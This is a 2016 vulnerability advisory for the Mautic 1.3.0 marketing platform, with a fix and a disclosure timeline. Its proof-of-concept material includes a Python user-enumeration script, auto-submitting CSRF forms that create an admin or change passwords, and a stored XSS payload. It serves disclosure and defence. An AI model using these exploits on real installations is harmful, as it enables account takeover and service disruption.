Mautic 1.3.0 CSRF / XSS / User Enumeration / DoS
Posted on 04 April 2016
###################################################################### # Exploit Title: Mautic v1.3.0 Multiple Vulnerabilities # Date: 01/04/2016 # Author: Mickael Dorigny @ Synetis # Vendor or Software Link: https://www.mautic.org/ # Version: 1.3.0 # Category: Multiple Vulnerabilities ###################################################################### Mautic description : ====================================================================== Mautic is an open source marketing automation platform Vulnerabilities description : ====================================================================== Mautic version 1.3.0 is vulnerable to multiple vulnerabilities like : - User Enumeration - DOS attack - CSRF (x3) - Stored XSS Poc n°1 : User Enumeration ============================================ The password reset process allow an attacker to try a large number of username/mail address so he can find wich username/mail are valid or not. This process allow an attacker to get a list of valid account on the Mautic installation and next perform a brute force attack on these accounts. PoC : [URL] http://MauticServer/s/passwordcheck [POSTDATA] passwordreset[identifier]=user&passwordreset[submit]=&passwordreset[_token]=pOiK8nnVsPHkYO2pjJx9iz1jrioXOi0Q7GAdxgEk6jU When a username/mail is valid, the response of the server is : "A new password has been generated and will be emailed to you. If you do not receive it within a few minutes, check your spam box and/or contact the system administrator." When a username/mail isn't valid, the response of the server is : "No user could be identified with the given value. " This vulnerablity can be exploited with the following python script : import requests, time, sys, re IPServ= "http://10.2.0.109" if len(sys.argv) > 1: inputFile = sys.argv[1] else: print "[*] Usage : python " + sys.argv[0] + " <user file>" exit(0) URL1 = IPServ +'/passwordreset' URL2 = IPServ +'/passwordreset' with open(inputFile) as f: for username in f: username = username[:-1] print "[?] Test if "+ username +" exists..." session = requests.Session() r1 = session.get(URL1) token = re.search("token].*value="(.*)"",r1.text, re.IGNORECASE) data = {"passwordreset[identifier]" : username, "passwordreset[submit]" : "", "passwordreset[_token]" : token.group(1)} r2 = session.post(URL2, data=data) if r2.text.find("No user could be identified with the given value") == -1: print "[+] the user ["+ username +"] exists !" else: print "[-] Nope ..." So an attacker can exploit this response difference to do a user enumeration. PoC n°2 : partial DOS - reset user password ============================================ The password reset process can be used to make a partial DOS attack. This attack is a logical attack because the reset password process isn't correctly implemented. For a valid username/mail given to the reset password form, the password is immediatly resetted to a random password send by mail. A good impletementation will first ask for a mail validation without changing the password before user validation. This logical attack will allow an attacker to reset all password of the mautic installation, this can affect the user experience (especially if the attacker run his attacks continuously), HelpDesk saturation, service interruption for user, etc. This vulnerability can be exploited massivly using the previously exposed python script or manually for a single targetted account. Note that all the valid username/mail can be find through the "User Enumeration" vulnerability previsouly exposed. PoC n°3 : CSRF on user/admin creation ============================================ The user creation process isn't protected against CSRF vulnerability. An attacker can force an administrator to create new user and/or new administrator using basic social engineering technics. Victim just have to visit a specific page controlled by the attacker that will make the user execute the correct request. PoC : [URL] http://MauticServer/s/users/new?mauticUserLastActive=1&mauticLastNotificationId=57 [POSTDATA] user[firstName]=AZEAA&user[lastName]=AAA&user[role]=1&user[position]=&user[signature]=Best+regards,+|FROM_NAME|&user[username]=AZEAZEAAA&user[email]=azeaze@azeaaze.fr&user[plainPassword][password]=321321&user[plainPassword][confirm]=321321&user[timezone]=&user[locale]=&user[isPublished]=1&user[buttons][apply]= The following HTML file contains an auto-submit form that send to the targeted Mautic correct URL and parameters to create a new user : <html><body> <form method=POST action='http://MauticServer/s/users/new?mauticUserLastActive=1&mauticLastNotificationId=57'> <input type=hidden name='user[firstName]' value='userpp'> <input type=hidden name='user[lastName]' value='userpp'> <input type=hidden name='user[role]' value='1'> <input type=hidden name='user[position]' value=''> <input type=hidden name='user[signature]' value='Best+regards,+|FROM_NAME|'> <input type=hidden name='user[username]' value='userpp'> <input type=hidden name='user[email]' value='userpp@userpp.fr'> <input type=hidden name='user[plainPassword][password]' value='321321'> <input type=hidden name='user[plainPassword][confirm]' value='321321'> <input type=hidden name='user[timezone]' value=''> <input type=hidden name='user[locale]' value=''> <input type=hidden name='user[isPublished]' value='1'> <input type=hidden name='user[buttons][apply]' value=''> <input style="display:none" type=submit> <form> <script>document.forms[0].submit();</script> </body></html> Through this vulnerability, an attacker can take control of the Mautic installation by making an administrator create another administrator with pre-defined login and password. PoC n°4 : CSRF on password change ============================================ The password changing process isn't protected against CSRF vulnerability. An attacker can force an user or an administrator to change his password using basic social engineering technics. Victim just have to visit a specific page controlled by the attacker that will make the user execute the correct request. PoC : [URL] http://MauticServer/s/account?mauticUserLastActive=1&mauticLastNotificationId=48' [POSTDATA] user[username]=user&user[firstName]=UserName&user[lastName]=LastName&user[position]=&user[email]=user@example.com&user[timezone]=&user[locale]=&user[plainPassword][password]=321321&user[plainPassword][confirm]=321321&user[signature]=Best+regards,+|FROM_NAME|&user[unlockModel]=user.user&user[unlockId]=1&user[buttons][save]= The following HTML file contains an auto-submit form that send to the targeted Mautic correct URL and parameters to change user password : <html><body> <form method=POST action='http://MauticServer/s/account?mauticUserLastActive=1&mauticLastNotificationId=48'> <input type=hidden name='user[username]' value='userpp'> <input type=hidden name='user[firstName]' value='userpp'> <input type=hidden name='user[lastName]' value='userpp'> <input type=hidden name='user[position]' value=''> <input type=hidden name='user[email]' value='userpp@userpp.fr'> <input type=hidden name='user[timezone]' value=''> <input type=hidden name='user[locale]' value=''> <input type=hidden name='user[plainPassword][password]' value='987987'> <input type=hidden name='user[plainPassword][confirm]' value='987987'> <input type=hidden name='user[signature]' value='Best+regards,+|FROM_NAME|'> <input type=hidden name='user[unlockModel]' value='user.user'> <input type=hidden name='user[unlockId]' value='1'> <input type=hidden name='user[buttons][save]' value=''> <input style="display:none" type=submit> <form> <script>document.forms[0].submit();</script> </body></html> Through this vulnerability, an attacker can take control of the Mautic installation by forcing an administrator to change his password and then connect with the admin account. PoC n°5 : Stored XSS Landing Page ============================================ Landing page "Title" and "Custom Html Content" input are vulnerable to Stored XSS. We can use some javascript payload to execute javascript instruction in the user/admin browser context. PoC : [URL] http://MauticServer/s/pages/edit/1?mauticUserLastActive=1&mauticLastNotificationId=36 HTTP/1.1 [POSTDATA] page[title]=Page01+<script>alert(0);</script>&page[alias]=page01Page01+<img+src="X"+/>&page[template]=&page[customHtml]=<html> <head> <title></title> </head> <body> <p>Page01+<script>alert(0);</script></p> </body> </html> &page[category]=&page[language]=en&page[translationParent]=&page[isPublished]=1&page[publishUp]=&page[publishDown]=&page[metaDescription]=&page[sessionId]=1&page[redirectType]=&page[redirectUrl]=&page[unlockModel]=page.page&page[unlockId]=1&page[buttons][apply]= Through this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such cookies, and especially admin's ones. PoC n°6 : CSRF Landing page creation ============================================ The landing page creation process isn't protected against CSRF vulnerability. An attacker can force an user or an administrator to create a new landing page using basic social engineering technics. Victim just have to visit a specific page controlled by the attacker that will make the user execute the correct request. PoC: [URL] http://MauticServer/s/pages/new?mauticUserLastActive=1&mauticLastNotificationId=69' [POSTDATA] page[title]=Page02&page[template]=&page[customHtml]=<html> <head> <title></title> </head> <body> <p>Page02</p> </body> </html> &page[category]=&page[language]=en&page[translationParent]=&page[isPublished]=1&page[publishUp]=&page[publishDown]=&page[metaDescription]=&page[sessionId]=1&page[redirectType]=&page[redirectUrl]=&page[buttons][apply]= The following HTML file contains an auto-submit form that send to the targeted Mautic correct URL and parameters to create a new Landing page : <html><body> <form method=POST action='http://MauticServer/s/pages/new?mauticUserLastActive=1&mauticLastNotificationId=69'> <input type=hidden name='page[title]' value='Page03'> <input type=hidden name='page[alias]' value='page02Page02'> <input type=hidden name='page[template]' value=''> <input type=hidden name='page[customHtml]' value='<html> <head> <title></title> </head> <body> <p>Page02></p> </body> </html> '> <input type=hidden name='page[category]' value=''> <input type=hidden name='page[language]' value='en'> <input type=hidden name='page[translationParent]' value=''> <input type=hidden name='page[isPublished]' value='1'> <input type=hidden name='page[publishUp]' value=''> <input type=hidden name='page[publishDown]' value=''> <input type=hidden name='page[metaDescription]' value=''> <input type=hidden name='page[sessionId]' value='1'> <input type=hidden name='page[redirectType]' value=''> <input type=hidden name='page[redirectUrl]' value=''> <input type=hidden name='page[buttons][apply]' value=''> <input style="display:none" type=submit> <form> <script>document.forms[0].submit();</script> </body></html> Note that this vulnerability can be combined to "Stored XSS Landing page" to get into a privilege escalation scenario from an external position without any privilege. Solution: ====================================================================== Update your mautic installation to superior version. (version 1.3.1 can be find here : https://github.com/mautic/mautic/releases/tag/1.3.1) Additional resources : ====================================================================== - https://youtu.be/TOZOwOYqZ34 Report timeline : ====================================================================== 2016-03-16 : Editor informed for vulnerabilities 2016-03-19 : Editor fix vulnerabilities and release news vesion 2016-04-01 : Advisory release Credits : ====================================================================== Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/ -- SYNETIS CONTACT: www.synetis.com | www.information-security.fr
